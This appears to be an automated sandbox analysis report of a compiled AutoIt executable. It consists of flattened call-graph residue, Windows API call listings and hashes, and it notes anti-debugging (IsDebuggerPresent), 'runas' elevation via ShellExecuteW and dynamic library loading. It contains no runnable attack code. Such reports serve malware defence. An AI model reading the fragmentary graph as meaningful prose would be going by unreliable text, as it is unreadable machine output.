__wsplitpath_helper 87103->87595 87106 414e4e __ftell_nolock 51 API calls 87104->87106 87107 415024 87106->87107 87596 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87107->87596 
87109 41500a __write 87109->87012 87111 414dd6 87110->87111 87112 414deb 87110->87112 87121 417f77 46 API calls __getptd_noexit 87111->87121 87112->87111 87114 414df2 87112->87114 87123 41b91b 79 API calls 11 library calls 87114->87123 87116 414ddb 87122 417f25 10 API calls __wsplitpath_helper 87116->87122 87118 414e18 87120 414de6 87118->87120 87124 418f98 77 API calls 6 library calls 87118->87124 87120->87064 87121->87116 87122->87120 87123->87118 87124->87120 87128 414910 __write 87125->87128 87126 414923 87181 417f77 46 API calls __getptd_noexit 87126->87181 87128->87126 87129 414951 87128->87129 87144 41d4d1 87129->87144 87130 414928 87182 417f25 10 API calls __wsplitpath_helper 87130->87182 87133 414956 87134 41496a 87133->87134 87135 41495d 87133->87135 87137 414992 87134->87137 87138 414972 87134->87138 87183 417f77 46 API calls __getptd_noexit 87135->87183 87161 41d218 87137->87161 87184 417f77 46 API calls __getptd_noexit 87138->87184 87139 414933 __write @_EH4_CallFilterFunc@8 87139->87068 87145 41d4dd __write 87144->87145 87146 4182cb __lock 46 API calls 87145->87146 87159 41d4eb 87146->87159 87147 41d560 87186 41d5fb 87147->87186 87148 41d567 87149 416b04 __malloc_crt 46 API calls 87148->87149 87151 41d56e 87149->87151 87151->87147 87153 41d57c InitializeCriticalSectionAndSpinCount 87151->87153 87152 41d5f0 __write 87152->87133 87154 41d59c 87153->87154 87155 41d5af EnterCriticalSection 87153->87155 87158 413748 _free 46 API calls 87154->87158 87155->87147 87156 418209 __mtinitlocknum 46 API calls 87156->87159 87158->87147 87159->87147 87159->87148 87159->87156 87189 4154b2 47 API calls __lock 87159->87189 87190 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87159->87190 87162 41d23a 87161->87162 87163 41d255 87162->87163 87174 41d26c __wopenfile 87162->87174 87195 417f77 46 API calls __getptd_noexit 87163->87195 87165 41d25a 87196 417f25 10 API calls __wsplitpath_helper 87165->87196 87166 41d47a 87200 417f77 46 API calls __getptd_noexit 
[Execution-graph residue: this part of the Joe Sandbox call graph (numeric node ids and function addresses linked as "node->node", e.g. 87166->87200, 41d48c) was flattened to text when the graph widget was extracted. The recoverable node labels are the Windows API and CRT routines reached from the sample's code: EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, CreateFileW, ReadFile, WriteFile, SetFilePointer, SetFilePointerEx, CloseHandle, GetLastError, MultiByteToWideChar, GetSystemTimeAsFileTime, GetFullPathNameW, SHGetDesktopFolder, SHGetPathFromIDListW, InterlockedIncrement, InterlockedDecrement, Sleep, VariantInit, VariantCopy, VariantClear, CharUpperBuffW, GetFileAttributesW, FindFirstFileW, FindClose, FreeLibrary, VirtualProtect, GetCurrentProcess, TerminateProcess, plus CRT internals such as __wsplitpath_helper, __write, __read, __lock_file, __lock_fhandle, __unlock_fhandle, __lseeki64_nolock, __fclose_nolock, __fcloseall, __fread_nolock, __flush, __dosmaperr, __getptd_noexit, __tzset_nolock, __wcsicoll, __malloc_crt, _malloc, _free, _wcslen, _wcscpy, _wcsncpy, _memmove, _strcat, _fseek, _wprintf and moneypunct. The edge list is truncated at both ends of this section.]
calls 88400->88445 88407 4533eb 85 API calls 88401->88407 88403 46e7e5 88402->88403 88410 46e82f 88402->88410 88404 408f40 VariantClear 88403->88404 88406 46e7ea 88404->88406 88406->88247 88408 46e7ca 88407->88408 88411 40de40 60 API calls 88408->88411 88409 46e8b5 88438 4680ed 88409->88438 88410->88409 88412 46e845 88410->88412 88413 46e7d7 88411->88413 88415 4533eb 85 API calls 88412->88415 88413->88410 88416 46e7db 88413->88416 88428 46e84b 88415->88428 88416->88403 88418 44ae3e CloseHandle 88416->88418 88417 46e87a 88446 4689f4 59 API calls 88417->88446 88418->88403 88419 46e8bb 88442 443fbe 88419->88442 88420 46e883 88423 4013c0 52 API calls 88420->88423 88425 46e88f 88423->88425 88426 40e0a0 52 API calls 88425->88426 88429 46e899 88426->88429 88427 408f40 VariantClear 88436 46e881 88427->88436 88428->88417 88428->88420 88447 40d200 52 API calls 2 library calls 88429->88447 88431 46e911 88431->88247 88432 46e8a5 88448 4689f4 59 API calls 88432->88448 88433 40da20 CloseHandle 88435 46e903 88433->88435 88437 44ae3e CloseHandle 88435->88437 88436->88431 88436->88433 88437->88431 88439 468100 88438->88439 88440 4680fa 88438->88440 88439->88419 88449 467ac4 55 API calls 2 library calls 88440->88449 88450 443e36 88442->88450 88444 443fd3 88444->88427 88444->88436 88445->88401 88446->88436 88447->88432 88448->88436 88449->88439 88453 443e19 88450->88453 88454 443e26 88453->88454 88455 443e32 WriteFile 88453->88455 88456 443db4 SetFilePointerEx SetFilePointerEx 88454->88456 88455->88444 88456->88455 88457->88006 88458->87928 88459->87973 88460->88037 88461->87973 88462->87973 88463->87947 88464->87969 88465->87938 88466->87942 88467->87948 88468->88000 88469->88000 88470->88000 88471->87961 88472->87929 88473->87966 88474->87994 88475->88015 88476->88015 88477->88006 88478->88020 88479->88032 88480->88027 88481->88035 88482->88040 88483->88040 88484->87929 88485->87933 88486 42d154 88490 480a8d 88486->88490 88488 42d161 88489 480a8d 194 API calls 88488->88489 
88489->88488 88491 480ae4 88490->88491 88492 480b26 88490->88492 88494 480aeb 88491->88494 88495 480b15 88491->88495 88493 40bc70 52 API calls 88492->88493 88504 480b2e 88493->88504 88496 480aee 88494->88496 88497 480b04 88494->88497 88523 4805bf 194 API calls 88495->88523 88496->88492 88499 480af3 88496->88499 88522 47fea2 194 API calls __itow_s 88497->88522 88521 47f135 194 API calls 88499->88521 88501 40e0a0 52 API calls 88501->88504 88503 408f40 VariantClear 88506 481156 88503->88506 88504->88501 88507 480aff 88504->88507 88510 401980 53 API calls 88504->88510 88512 40c2c0 52 API calls 88504->88512 88513 408e80 VariantClear 88504->88513 88514 480ff5 88504->88514 88515 40e710 53 API calls 88504->88515 88516 40a780 194 API calls 88504->88516 88524 45377f 52 API calls 88504->88524 88525 45e951 53 API calls 88504->88525 88526 40e830 53 API calls 88504->88526 88527 47925f 53 API calls 88504->88527 88528 47fcff 194 API calls 88504->88528 88508 408f40 VariantClear 88506->88508 88507->88503 88509 48115e 88508->88509 88509->88488 88510->88504 88512->88504 88513->88504 88529 45e737 90 API calls 3 library calls 88514->88529 88515->88504 88516->88504 88521->88507 88522->88507 88523->88507 88524->88504 88525->88504 88526->88504 88527->88504 88528->88504 88529->88507 88530 42b14b 88537 40bc10 88530->88537 88532 42b159 88533 4096a0 331 API calls 88532->88533 88534 42b177 88533->88534 88548 44b92d VariantClear 88534->88548 88536 42bc5b 88538 40bc24 88537->88538 88539 40bc17 88537->88539 88541 40bc2a 88538->88541 88542 40bc3c 88538->88542 88540 408e80 VariantClear 88539->88540 88543 40bc1f 88540->88543 88544 408e80 VariantClear 88541->88544 88545 4115d7 52 API calls 88542->88545 88543->88532 88546 40bc33 88544->88546 88547 40bc43 88545->88547 88546->88532 88547->88532 88548->88536 88549 425b2b 88554 40f000 88549->88554 88553 425b3a 88555 4115d7 52 API calls 88554->88555 88556 40f007 88555->88556 88557 4276ea 88556->88557 88563 40f030 88556->88563 88562 41130a 51 API calls 
__cinit 88562->88553 88564 40f039 88563->88564 88565 40f01a 88563->88565 88593 41130a 51 API calls __cinit 88564->88593 88567 40e500 88565->88567 88568 40bc70 52 API calls 88567->88568 88569 40e515 GetVersionExW 88568->88569 88570 402160 52 API calls 88569->88570 88571 40e557 88570->88571 88594 40e660 88571->88594 88575 427674 88581 4276c6 GetSystemInfo 88575->88581 88579 40e5e0 88582 4276d5 GetSystemInfo 88579->88582 88608 40efd0 88579->88608 88580 40e5cd GetCurrentProcess 88615 40ef20 LoadLibraryA GetProcAddress 88580->88615 88581->88582 88586 40e629 88612 40ef90 88586->88612 88589 40e641 FreeLibrary 88590 40e644 88589->88590 88591 40e653 FreeLibrary 88590->88591 88592 40e656 88590->88592 88591->88592 88592->88562 88593->88565 88595 40e667 88594->88595 88596 42761d 88595->88596 88597 40c600 52 API calls 88595->88597 88598 40e55c 88597->88598 88599 40e680 88598->88599 88600 40e687 88599->88600 88601 427616 88600->88601 88602 40c600 52 API calls 88600->88602 88603 40e566 88602->88603 88603->88575 88604 40ef60 88603->88604 88605 40e5c8 88604->88605 88606 40ef66 LoadLibraryA 88604->88606 88605->88579 88605->88580 88606->88605 88607 40ef77 GetProcAddress 88606->88607 88607->88605 88609 40e620 88608->88609 88610 40efd6 LoadLibraryA 88608->88610 88609->88581 88609->88586 88610->88609 88611 40efe7 GetProcAddress 88610->88611 88611->88609 88616 40efb0 LoadLibraryA GetProcAddress 88612->88616 88614 40e632 GetNativeSystemInfo 88614->88589 88614->88590 88615->88579 88616->88614 88617 425b5e 88622 40c7f0 88617->88622 88621 425b6d 88657 40db10 52 API calls 88622->88657 88624 40c82a 88658 410ab0 6 API calls 88624->88658 88626 40c86d 88627 40bc70 52 API calls 88626->88627 88628 40c877 88627->88628 88629 40bc70 52 API calls 88628->88629 88630 40c881 88629->88630 88631 40bc70 52 API calls 88630->88631 88632 40c88b 88631->88632 88633 40bc70 52 API calls 88632->88633 88634 40c8d1 88633->88634 88635 40bc70 52 API calls 88634->88635 88636 40c991 88635->88636 88659 40d2c0 52 API calls 
88636->88659 88638 40c99b 88660 40d0d0 53 API calls 88638->88660 88640 40c9c1 88641 40bc70 52 API calls 88640->88641 88642 40c9cb 88641->88642 88661 40e310 53 API calls 88642->88661 88644 40ca28 88645 408f40 VariantClear 88644->88645 88646 40ca30 88645->88646 88647 408f40 VariantClear 88646->88647 88648 40ca38 GetStdHandle 88647->88648 88649 429630 88648->88649 88650 40ca87 88648->88650 88649->88650 88651 429639 88649->88651 88656 41130a 51 API calls __cinit 88650->88656 88662 4432c0 57 API calls 88651->88662 88653 429641 88663 44b6ab CreateThread 88653->88663 88655 42964f CloseHandle 88655->88650 88656->88621 88657->88624 88658->88626 88659->88638 88660->88640 88661->88644 88662->88653 88663->88655 88664 44b5cb 58 API calls 88663->88664 88665 425b6f 88670 40dc90 88665->88670 88669 425b7e 88671 40bc70 52 API calls 88670->88671 88672 40dd03 88671->88672 88678 40f210 88672->88678 88674 40dd96 88676 40ddb7 88674->88676 88681 40dc00 52 API calls 2 library calls 88674->88681 88677 41130a 51 API calls __cinit 88676->88677 88677->88669 88682 40f250 RegOpenKeyExW 88678->88682 88680 40f230 88680->88674 88681->88674 88683 425e17 88682->88683 88684 40f275 RegQueryValueExW 88682->88684 88683->88680 88685 40f2c3 RegCloseKey 88684->88685 88686 40f298 88684->88686 88685->88680 88687 40f2a9 RegCloseKey 88686->88687 88688 425e1d 88686->88688 88687->88680 88689 40de3f0 88703 40dc040 88689->88703 88691 40de485 88706 40de2e0 88691->88706 88705 40dc6cb 88703->88705 88709 40df4b0 GetPEB 88703->88709 88705->88691 88707 40de2e9 Sleep 88706->88707 88708 40de2f7 88707->88708 88709->88705
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
• runas, xrefs: 0042E2AD, 0042E2DC
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
• String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2495805114-3383388033
• Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
• Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph (function at 0040E500, executed and not-executed blocks marked in the original graph; calls GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, FreeLibrary)
APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
• String ID: 0SH
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
• Sleep.KERNEL32(0000000A,?), ref: 004094D1
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Message$Peek$DispatchSleepTranslate
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE

Control-flow Graph
APIs
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• __wcsicoll.LIBCMT ref: 00402007
• __wcsicoll.LIBCMT ref: 0040201D
• __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
• __wcsicoll.LIBCMT ref: 00402049
• _wcscpy.LIBCMT ref: 0040207C
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW

Control-flow Graph

APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
• __wsplitpath.LIBCMT ref: 0040E41C
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcsncat.LIBCMT ref: 0040E433
• __wmakepath.LIBCMT ref: 0040E44F
  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• _wcscpy.LIBCMT ref: 0040E487
  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• _wcscat.LIBCMT ref: 00427541
• _wcslen.LIBCMT ref: 00427551
• _wcslen.LIBCMT ref: 00427562
• _wcscat.LIBCMT ref: 0042757C
• _wcsncpy.LIBCMT ref: 004275BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
• String ID: Include$\
• API String ID: 3173733714-3429789819
• Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
• Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

Control-flow Graph

APIs
• _fseek.LIBCMT ref: 0045292B
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452961
• __fread_nolock.LIBCMT ref: 00452971
• __fread_nolock.LIBCMT ref: 0045298A
• __fread_nolock.LIBCMT ref: 004529A5
• _fseek.LIBCMT ref: 004529BF
• _malloc.LIBCMT ref: 004529CA
• _malloc.LIBCMT ref: 004529D6
• __fread_nolock.LIBCMT ref: 004529E7
• _free.LIBCMT ref: 00452A17
• _free.LIBCMT ref: 00452A20
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fread_nolock$_free_fseek_malloc_wcscpy
• String ID:
• API String ID: 1255752989-0
• Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
• Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764
• Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
• Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(00A2F2E8,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
